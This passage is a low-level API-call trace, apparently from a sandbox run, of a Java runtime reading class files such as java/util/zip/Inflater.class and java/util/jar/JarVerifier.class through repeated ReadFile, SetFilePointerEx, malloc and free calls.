lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208e480*=0xa0, lpOverlapped=0x0) returned 1 [0102.421] malloc (_Size=0x2f) returned 0x12298900 [0102.421] strlen (_Str="java/util/zip/ZipFile$ZipFileInputStream.class") returned 0x2e [0102.421] strcpy (in: _Dest=0x208e630, _Source="java/util/zip/ZipFile$ZipFileInputStream.class" | out: _Dest="java/util/zip/ZipFile$ZipFileInputStream.class") returned="java/util/zip/ZipFile$ZipFileInputStream.class" [0102.422] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f4202, lpNewFilePointer=0x208e0b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0b0*=51331586) returned 1 [0102.422] ReadFile (in: hFile=0x134, lpBuffer=0x208e100, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e080, lpOverlapped=0x0 | out: lpBuffer=0x208e100*, lpNumberOfBytesRead=0x208e080*=0x1e, lpOverlapped=0x0) returned 1 [0102.422] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f424e, lpNewFilePointer=0x208e110, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e110*=51331662) returned 1 [0102.422] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x70e, lpNumberOfBytesRead=0x208e0e0, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208e0e0*=0x70e, lpOverlapped=0x0) returned 1 [0102.422] free (_Block=0x121d7af0) [0102.422] free (_Block=0x1228eb40) [0102.435] strlen (_Str="java/util/zip/Inflater.class") returned 0x1c [0102.435] malloc (_Size=0x48) returned 0x1228e140 [0102.435] malloc (_Size=0xa0) returned 0x12296730 [0102.435] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418077, lpNewFilePointer=0x208e430, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e430*=54624375) returned 1 [0102.435] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e400, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208e400*=0xa0, lpOverlapped=0x0) returned 1 [0102.435] malloc (_Size=0x1d) returned 0x121d7af0 [0102.436] strlen (_Str="java/util/zip/Inflater.class") returned 0x1c [0102.436] strcpy (in: _Dest=0x208e5b0, _Source="java/util/zip/Inflater.class" | out: _Dest="java/util/zip/Inflater.class") returned="java/util/zip/Inflater.class" [0102.436] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f347d, lpNewFilePointer=0x208e030, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e030*=51328125) returned 1 [0102.436] ReadFile (in: hFile=0x134, lpBuffer=0x208e080, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e000, lpOverlapped=0x0 | out: lpBuffer=0x208e080*, lpNumberOfBytesRead=0x208e000*=0x1e, lpOverlapped=0x0) returned 1 [0102.440] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f34b7, lpNewFilePointer=0x208e090, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e090*=51328183) returned 1 [0102.440] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0xd4b, lpNumberOfBytesRead=0x208e060, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208e060*=0xd4b, lpOverlapped=0x0) returned 1 [0102.440] free (_Block=0x12298900) [0102.440] free (_Block=0x1228e3c0) [0102.458] strlen (_Str="java/util/zip/ZStreamRef.class") returned 0x1e [0102.458] malloc (_Size=0x48) returned 0x1228e5a0 [0102.458] malloc (_Size=0xa0) returned 0x12296730 [0102.458] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341802b, lpNewFilePointer=0x208e3c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3c0*=54624299) returned 1 [0102.458] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e390, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208e390*=0xa0, lpOverlapped=0x0) returned 1 [0102.458] malloc (_Size=0x1f) returned 0x12221ea0 [0102.459] strlen (_Str="java/util/zip/ZStreamRef.class") returned 0x1e [0102.459] strcpy (in: _Dest=0x208e540, _Source="java/util/zip/ZStreamRef.class" | out: _Dest="java/util/zip/ZStreamRef.class") returned="java/util/zip/ZStreamRef.class" [0102.459] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f333d, lpNewFilePointer=0x208dfc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dfc0*=51327805) returned 1 [0102.459] ReadFile (in: hFile=0x134, lpBuffer=0x208e010, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208df90, lpOverlapped=0x0 | out: lpBuffer=0x208e010*, lpNumberOfBytesRead=0x208df90*=0x1e, lpOverlapped=0x0) returned 1 [0102.459] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f3379, lpNewFilePointer=0x208e020, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e020*=51327865) returned 1 [0102.459] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x104, lpNumberOfBytesRead=0x208dff0, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208dff0*=0x104, lpOverlapped=0x0) returned 1 [0102.459] free (_Block=0x121d7af0) [0102.460] free (_Block=0x1228e140) [0102.468] calloc (_Count=0x1, _Size=0x58) returned 0x12228f40 [0102.468] malloc (_Size=0x1bf0) returned 0x122dd250 [0102.469] malloc (_Size=0x48) returned 0x1228ea50 [0102.469] malloc (_Size=0xa0) returned 0x12296730 [0102.469] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417fc7, lpNewFilePointer=0x208e4b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e4b0*=54624199) returned 1 [0102.469] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e480, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208e480*=0xa0, lpOverlapped=0x0) returned 1 [0102.469] malloc (_Size=0x37) returned 0x12298f40 [0102.470] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f2b7e, lpNewFilePointer=0x208e0b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0b0*=51325822) returned 1 [0102.470] ReadFile (in: hFile=0x134, lpBuffer=0x208e100, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e080, lpOverlapped=0x0 | out: lpBuffer=0x208e100*, lpNumberOfBytesRead=0x208e080*=0x1e, lpOverlapped=0x0) returned 1 [0102.476] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f2bd2, lpNewFilePointer=0x208e110, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e110*=51325906) returned 1 [0102.476] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x76b, lpNumberOfBytesRead=0x208e0e0, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208e0e0*=0x76b, lpOverlapped=0x0) returned 1 [0102.477] malloc (_Size=0x48) returned 0x1228e640 [0102.477] malloc (_Size=0xa0) returned 0x12296730 [0102.477] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417f72, lpNewFilePointer=0x208da70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208da70*=54624114) returned 1 [0102.477] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208da40, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208da40*=0xa0, lpOverlapped=0x0) returned 1 [0102.477] malloc (_Size=0x28) returned 0x121d7af0 [0102.477] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f206f, lpNewFilePointer=0x208d670, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d670*=51322991) returned 1 [0102.477] ReadFile (in: hFile=0x134, lpBuffer=0x208d6c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d640, lpOverlapped=0x0 | out: lpBuffer=0x208d6c0*, lpNumberOfBytesRead=0x208d640*=0x1e, lpOverlapped=0x0) returned 1 [0102.477] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f20b4, lpNewFilePointer=0x208d6d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d6d0*=51323060) returned 1 [0102.477] ReadFile (in: hFile=0x134, lpBuffer=0x1225c2a0, nNumberOfBytesToRead=0xaca, lpNumberOfBytesRead=0x208d6a0, lpOverlapped=0x0 | out: lpBuffer=0x1225c2a0*, lpNumberOfBytesRead=0x208d6a0*=0xaca, lpOverlapped=0x0) returned 1 [0102.480] malloc (_Size=0x48) returned 0x1228e3c0 [0102.480] malloc (_Size=0xa0) returned 0x12296730 [0102.480] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3417f2e, lpNewFilePointer=0x208e2b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e2b0*=54624046) returned 1 [0102.480] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e280, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208e280*=0xa0, lpOverlapped=0x0) returned 1 [0102.480] malloc (_Size=0x17) returned 0x12293090 [0102.480] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f1c2e, lpNewFilePointer=0x208deb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208deb0*=51321902) returned 1 [0102.481] ReadFile (in: hFile=0x134, lpBuffer=0x208df00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208de80, lpOverlapped=0x0 | out: lpBuffer=0x208df00*, lpNumberOfBytesRead=0x208de80*=0x1e, lpOverlapped=0x0) returned 1 [0102.485] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30f1c62, lpNewFilePointer=0x208df10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df10*=51321954) returned 1 [0102.485] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x40d, lpNumberOfBytesRead=0x208dee0, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208dee0*=0x40d, lpOverlapped=0x0) returned 1 [0102.492] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x39, lpNewFilePointer=0x208d0d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d0d0*=57) returned 1 [0102.492] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d120, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d0a0, lpOverlapped=0x0 | out: lpBuffer=0x208d120*, lpNumberOfBytesRead=0x208d0a0*=0x1e, lpOverlapped=0x0) returned 1 [0102.492] SetFilePointerEx (in: hFile=0x2c0, liDistanceToMove=0x6b, lpNewFilePointer=0x208d130, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d130*=107) returned 1 [0102.492] ReadFile (in: hFile=0x2c0, lpBuffer=0x208d240, nNumberOfBytesToRead=0xa3, lpNumberOfBytesRead=0x208d100, lpOverlapped=0x0 | out: lpBuffer=0x208d240*, lpNumberOfBytesRead=0x208d100*=0xa3, lpOverlapped=0x0) returned 1 [0102.494] malloc (_Size=0x8000) returned 0x122dee50 [0102.501] strlen (_Str="java/util/jar/Attributes.class") returned 0x1e [0102.501] malloc (_Size=0x48) returned 0x1228e410 [0102.501] malloc (_Size=0xa0) returned 0x12296730 [0102.501] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3405834, lpNewFilePointer=0x208e5a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e5a0*=54548532) returned 1 [0102.501] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e570, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208e570*=0xa0, lpOverlapped=0x0) returned 1 [0102.502] malloc (_Size=0x1f) returned 0x121d7af0 [0102.502] strlen (_Str="java/util/jar/Attributes.class") returned 0x1e [0102.502] strcpy (in: _Dest=0x208e720, _Source="java/util/jar/Attributes.class" | out: _Dest="java/util/jar/Attributes.class") returned="java/util/jar/Attributes.class" [0102.502] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2e02ca1, lpNewFilePointer=0x208e1a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1a0*=48245921) returned 1 [0102.504] ReadFile (in: hFile=0x134, lpBuffer=0x208e1f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e170, lpOverlapped=0x0 | out: lpBuffer=0x208e1f0*, lpNumberOfBytesRead=0x208e170*=0x1e, lpOverlapped=0x0) returned 1 [0102.506] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2e02cdd, lpNewFilePointer=0x208e200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e200*=48245981) returned 1 [0102.506] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x14a3, lpNumberOfBytesRead=0x208e1d0, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208e1d0*=0x14a3, lpOverlapped=0x0) returned 1 [0102.507] free (_Block=0x12293090) [0102.507] free (_Block=0x1228e3c0) [0102.511] malloc (_Size=0x48) returned 0x1228e460 [0102.511] malloc (_Size=0xa0) returned 0x12296730 [0102.511] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34057da, lpNewFilePointer=0x208e4f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e4f0*=54548442) returned 1 [0102.512] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e4c0, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208e4c0*=0xa0, lpOverlapped=0x0) returned 1 [0102.514] malloc (_Size=0x2d) returned 0x12298480 [0102.514] strlen (_Str="java/util/jar/Manifest$FastInputStream.class") returned 0x2c [0102.514] strcpy (in: _Dest=0x208e670, _Source="java/util/jar/Manifest$FastInputStream.class" | out: _Dest="java/util/jar/Manifest$FastInputStream.class") returned="java/util/jar/Manifest$FastInputStream.class" [0102.514] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2e02557, lpNewFilePointer=0x208e0f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0f0*=48244055) returned 1 [0102.514] ReadFile (in: hFile=0x134, lpBuffer=0x208e140, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e0c0, lpOverlapped=0x0 | out: lpBuffer=0x208e140*, lpNumberOfBytesRead=0x208e0c0*=0x1e, lpOverlapped=0x0) returned 1 [0102.515] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2e025a1, lpNewFilePointer=0x208e150, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e150*=48244129) returned 1 [0102.516] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x700, lpNumberOfBytesRead=0x208e120, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208e120*=0x700, lpOverlapped=0x0) returned 1 [0102.516] free (_Block=0x121d7af0) [0102.516] free (_Block=0x1228e410) [0102.653] strlen (_Str="java/util/jar/Attributes$Name.class") returned 0x23 [0102.653] malloc (_Size=0x48) returned 0x1228ec30 [0102.653] malloc (_Size=0xa0) returned 0x12296730 [0102.653] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x340573d, lpNewFilePointer=0x208e3e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e3e0*=54548285) returned 1 [0102.654] ReadFile (in: hFile=0x134, lpBuffer=0x12296730, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e3b0, lpOverlapped=0x0 | out: lpBuffer=0x12296730*, lpNumberOfBytesRead=0x208e3b0*=0xa0, lpOverlapped=0x0) returned 1 [0102.655] malloc (_Size=0x24) returned 0x121d7af0 [0102.656] strlen (_Str="java/util/jar/Attributes$Name.class") returned 0x23 [0102.656] strcpy (in: _Dest=0x208e560, _Source="java/util/jar/Attributes$Name.class" | out: _Dest="java/util/jar/Attributes$Name.class") returned="java/util/jar/Attributes$Name.class" [0102.656] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2e000d1, lpNewFilePointer=0x208dfe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dfe0*=48234705) returned 1 [0102.656] ReadFile (in: hFile=0x134, lpBuffer=0x208e030, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dfb0, lpOverlapped=0x0 | out: lpBuffer=0x208e030*, lpNumberOfBytesRead=0x208dfb0*=0x1e, lpOverlapped=0x0) returned 1 [0102.658] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2e00112, lpNewFilePointer=0x208e040, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e040*=48234770) returned 1 [0102.658] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0xb49, lpNumberOfBytesRead=0x208e010, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208e010*=0xb49, lpOverlapped=0x0) returned 1 [0102.658] free (_Block=0x12298480) [0102.659] free (_Block=0x1228e460) [0102.683] strlen (_Str="sun/misc/ASCIICaseInsensitiveComparator.class") returned 0x2d [0102.683] malloc (_Size=0x48) returned 0x1228e730 [0102.683] malloc (_Size=0xa0) returned 0x122e6e60 [0102.683] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34056e2, lpNewFilePointer=0x208dfa0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dfa0*=54548194) returned 1 [0102.683] ReadFile (in: hFile=0x134, lpBuffer=0x122e6e60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208df70, lpOverlapped=0x0 | out: lpBuffer=0x122e6e60*, lpNumberOfBytesRead=0x208df70*=0xa0, lpOverlapped=0x0) returned 1 [0102.684] malloc (_Size=0x2e) returned 0x12298880 [0102.685] strlen (_Str="sun/misc/ASCIICaseInsensitiveComparator.class") returned 0x2d [0102.685] strcpy (in: _Dest=0x208e120, _Source="sun/misc/ASCIICaseInsensitiveComparator.class" | out: _Dest="sun/misc/ASCIICaseInsensitiveComparator.class") returned="sun/misc/ASCIICaseInsensitiveComparator.class" [0102.685] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2dffae0, lpNewFilePointer=0x208dba0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dba0*=48233184) returned 1 [0102.685] ReadFile (in: hFile=0x134, lpBuffer=0x208dbf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208db70, lpOverlapped=0x0 | out: lpBuffer=0x208dbf0*, lpNumberOfBytesRead=0x208db70*=0x1e, lpOverlapped=0x0) returned 1 [0102.741] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2dffb2b, lpNewFilePointer=0x208dc00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc00*=48233259) returned 1 [0102.741] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x5a6, lpNumberOfBytesRead=0x208dbd0, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208dbd0*=0x5a6, lpOverlapped=0x0) returned 1 [0102.744] free (_Block=0x121d7af0) [0102.744] free (_Block=0x1228ec30) [0102.755] strlen (_Str="java/util/jar/JarVerifier.class") returned 0x1f [0102.755] malloc (_Size=0x48) returned 0x1228e410 [0102.755] malloc (_Size=0xa0) returned 0x122e6e60 [0102.755] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3405695, lpNewFilePointer=0x208e600, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e600*=54548117) returned 1 [0102.755] ReadFile (in: hFile=0x134, lpBuffer=0x122e6e60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e5d0, lpOverlapped=0x0 | out: lpBuffer=0x122e6e60*, lpNumberOfBytesRead=0x208e5d0*=0xa0, lpOverlapped=0x0) returned 1 [0102.756] malloc (_Size=0x20) returned 0x121d7af0 [0102.757] strlen (_Str="java/util/jar/JarVerifier.class") returned 0x1f [0102.757] strcpy (in: _Dest=0x208e780, _Source="java/util/jar/JarVerifier.class" | out: _Dest="java/util/jar/JarVerifier.class") returned="java/util/jar/JarVerifier.class" [0102.757] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2dfca4d, lpNewFilePointer=0x208e200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e200*=48220749) returned 1 [0102.757] ReadFile (in: hFile=0x134, lpBuffer=0x208e250, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e1d0, lpOverlapped=0x0 | out: lpBuffer=0x208e250*, lpNumberOfBytesRead=0x208e1d0*=0x1e, lpOverlapped=0x0) returned 1 [0102.817] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2dfca8a, lpNewFilePointer=0x208e260, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e260*=48220810) returned 1 [0102.817] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x3056, lpNumberOfBytesRead=0x208e230, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208e230*=0x3056, lpOverlapped=0x0) returned 1 [0102.945] free (_Block=0x12298880) [0102.945] free (_Block=0x1228e730) [0102.970] strlen (_Str="java/security/CodeSigner.class") returned 0x1e [0102.970] malloc (_Size=0x48) returned 0x1228e230 [0102.971] malloc (_Size=0xa0) returned 0x122e6e60 [0102.971] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3405649, lpNewFilePointer=0x208e590, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e590*=54548041) returned 1 [0102.971] ReadFile (in: hFile=0x134, lpBuffer=0x122e6e60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e560, lpOverlapped=0x0 | out: lpBuffer=0x122e6e60*, lpNumberOfBytesRead=0x208e560*=0xa0, lpOverlapped=0x0) returned 1 [0102.971] malloc (_Size=0x1f) returned 0x12221ea0 [0102.971] strlen (_Str="java/security/CodeSigner.class") returned 0x1e [0102.971] strcpy (in: _Dest=0x208e710, _Source="java/security/CodeSigner.class" | out: _Dest="java/security/CodeSigner.class") returned="java/security/CodeSigner.class" [0102.971] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2dfc29c, lpNewFilePointer=0x208e190, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e190*=48218780) returned 1 [0102.971] ReadFile (in: hFile=0x134, lpBuffer=0x208e1e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e160, lpOverlapped=0x0 | out: lpBuffer=0x208e1e0*, lpNumberOfBytesRead=0x208e160*=0x1e, lpOverlapped=0x0) returned 1 [0102.971] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2dfc2d8, lpNewFilePointer=0x208e1f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1f0*=48218840) returned 1 [0102.972] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x775, lpNumberOfBytesRead=0x208e1c0, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208e1c0*=0x775, lpOverlapped=0x0) returned 1 [0102.972] free (_Block=0x121d7af0) [0102.973] free (_Block=0x1228e410) [0102.976] malloc (_Size=0x48) returned 0x1228e640 [0102.976] malloc (_Size=0xa0) returned 0x122e6e60 [0102.977] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34055fa, lpNewFilePointer=0x208e590, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e590*=54547962) returned 1 [0102.977] ReadFile (in: hFile=0x134, lpBuffer=0x122e6e60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e560, lpOverlapped=0x0 | out: lpBuffer=0x122e6e60*, lpNumberOfBytesRead=0x208e560*=0xa0, lpOverlapped=0x0) returned 1 [0102.977] malloc (_Size=0x22) returned 0x121d7af0 [0102.977] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2dfbfbf, lpNewFilePointer=0x208e190, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e190*=48218047) returned 1 [0102.977] ReadFile (in: hFile=0x134, lpBuffer=0x208e1e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e160, lpOverlapped=0x0 | out: lpBuffer=0x208e1e0*, lpNumberOfBytesRead=0x208e160*=0x1e, lpOverlapped=0x0) returned 1 [0103.144] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2dfbffe, lpNewFilePointer=0x208e1f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1f0*=48218110) returned 1 [0103.144] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x29e, lpNumberOfBytesRead=0x208e1c0, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208e1c0*=0x29e, lpOverlapped=0x0) returned 1 [0103.145] malloc (_Size=0x48) returned 0x1228e870 [0103.145] malloc (_Size=0xa0) returned 0x122e6e60 [0103.145] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34055a9, lpNewFilePointer=0x208e590, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e590*=54547881) returned 1 [0103.145] ReadFile (in: hFile=0x134, lpBuffer=0x122e6e60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e560, lpOverlapped=0x0 | out: lpBuffer=0x122e6e60*, lpNumberOfBytesRead=0x208e560*=0xa0, lpOverlapped=0x0) returned 1 [0103.145] malloc (_Size=0x24) returned 0x12221ea0 [0103.146] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2dfb74a, lpNewFilePointer=0x208e190, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e190*=48215882) returned 1 [0103.146] ReadFile (in: hFile=0x134, lpBuffer=0x208e1e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e160, lpOverlapped=0x0 | out: lpBuffer=0x208e1e0*, lpNumberOfBytesRead=0x208e160*=0x1e, lpOverlapped=0x0) returned 1 [0103.146] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2dfb78b, lpNewFilePointer=0x208e1f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e1f0*=48215947) returned 1 [0103.146] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x834, lpNumberOfBytesRead=0x208e1c0, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208e1c0*=0x834, lpOverlapped=0x0) returned 1 [0103.161] free (_Block=0x122dee50) [0103.162] free (_Block=0x122dd250) [0103.162] free (_Block=0x12228f40) [0103.163] free (_Block=0x12293450) [0103.164] free (_Block=0x1228e280) [0103.164] free (_Block=0x12221ae0) [0103.164] free (_Block=0x12296690) [0103.164] free (_Block=0x12292ef0) [0103.164] free (_Block=0x12293410) [0103.164] free (_Block=0x122933f0) [0103.164] free (_Block=0x122933d0) [0103.164] free (_Block=0x0) [0103.164] CloseHandle (hObject=0x2c0) returned 1 [0103.165] free (_Block=0x122965e0) [0103.168] malloc (_Size=0x48) returned 0x1228eaf0 [0103.169] malloc (_Size=0xa0) returned 0x122965e0 [0103.169] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418c0a, lpNewFilePointer=0x208e4d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e4d0*=54627338) returned 1 [0103.169] ReadFile (in: hFile=0x134, lpBuffer=0x122965e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e4a0, lpOverlapped=0x0 | out: lpBuffer=0x122965e0*, lpNumberOfBytesRead=0x208e4a0*=0xa0, lpOverlapped=0x0) returned 1 [0103.169] malloc (_Size=0x20) returned 0x121d7af0 [0103.169] strlen (_Str="java/net/URLClassLoader$1.class") returned 0x1f [0103.169] strcpy (in: _Dest=0x208e650, _Source="java/net/URLClassLoader$1.class" | out: _Dest="java/net/URLClassLoader$1.class") returned="java/net/URLClassLoader$1.class" [0103.169] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310f1cc, lpNewFilePointer=0x208e0d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0d0*=51442124) returned 1 [0103.169] ReadFile (in: hFile=0x134, lpBuffer=0x208e120, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e0a0, lpOverlapped=0x0 | out: lpBuffer=0x208e120*, lpNumberOfBytesRead=0x208e0a0*=0x1e, lpOverlapped=0x0) returned 1 [0103.172] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310f209, lpNewFilePointer=0x208e130, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e130*=51442185) returned 1 [0103.172] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x5c9, lpNumberOfBytesRead=0x208e100, lpOverlapped=0x0 | out: 